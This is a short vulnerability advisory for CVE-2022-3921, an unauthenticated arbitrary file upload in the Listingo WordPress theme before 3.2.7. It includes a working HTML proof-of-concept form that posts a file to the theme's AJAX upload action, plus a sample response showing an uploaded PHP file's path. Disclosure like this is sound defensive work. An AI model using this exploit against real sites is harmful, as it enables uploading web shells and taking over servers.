Listingo < 3.2.7 – Unauthenticated Arbitrary File Upload | CVE 2022-3921

Description

The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Listingo Unauthenticated File Upload</title>
</head>
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="listingo_uploader" id="listingo_uploader">
        <input type="submit" name="submit" value="Start Upload">
    </form>
</body>
</html>

The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}